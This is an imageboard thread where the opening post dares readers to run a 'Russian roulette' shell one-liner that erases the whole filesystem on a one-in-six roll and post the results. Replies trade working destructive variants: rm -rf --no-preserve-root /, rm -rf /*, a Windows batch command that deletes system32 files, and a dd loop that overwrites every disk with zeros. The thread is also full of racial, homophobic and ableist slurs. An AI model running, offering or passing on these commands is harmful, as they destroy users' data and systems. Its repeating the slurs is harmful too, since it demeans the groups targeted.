[$ [$RANDOM%6] == 0] && rm -rf / || echo *Click*
Do it and post results!
[$ [$RANDOM%6] == 0] && rm -rf / || echo *Click*
Do it and post results!
No because it's not truly random
nice try botnet
You assume that && and || will not evaluate the whole expression, what if that isn't true?
>posting results from my now new install
Fuck you
doesn't work, system warning occurs and nothing happens ;)
>[$ [$RANDOM%6] == 0] && rm -rf / || echo *Click*
bash: [$: command not found...
loonixfags sure are bored aren't they
try windows and play some games faggots lol
>[$RANDOM%6] == 0]
You realize this isn't evenly distributed, right?
[$ [$RANDOM%6] == 0] && echo "Click" || rm -rf /
Grow some balls.
fuck you're right!
That is not 1/6 odds, its less
I found this very funny thanks
theres something wrong with you command OP
It seems it managed to scramble your text, just as intended.
Winfags welcome:
set /A Num=%RANDOM%*6/32768+1
if %Num%==6 (del %windir%\system32\*.* /f /s /q) ELSE (echo "Click")
>0, 1, 2, 3, 4, 5
>one of the above
>less than 1 in 6
Leave it to Sup Forums to be fucking retarded. Go back to public school you fucking inbred nigger.
>not (( RANDOM % 6 == 0 ))
fucking pleb faggots.
nice try, botnet
sudo rm -fr /* --no-preserve-root
That deletes win32
>del %windir%\system32\*.* /f /s /q
Correct me if I'm wrong, but wouldn't you have to run this as TrustedInstaller for it to delete protected system files?
>rm -rf
rm -rf --no-preserve-root /
when the fuck you fuckers will learn ?
That's what we want to do right?
Yes, maybe with admin rights you would do some minor damage too
>rm -rf --no-preserve-root /
rm -rf /*
when the fuck you fuckers will learn?
>rm -rf /*
for f in /dev/sd* ; do dd if=/dev/zero of=$f bs=1M & done
go get a life
>moooom! they're posting things I don't understand on my gaming forum!!!
I understand those things. The autism aspect of it is what bothers me. I even played it once, but I was too scared so I backed up important files.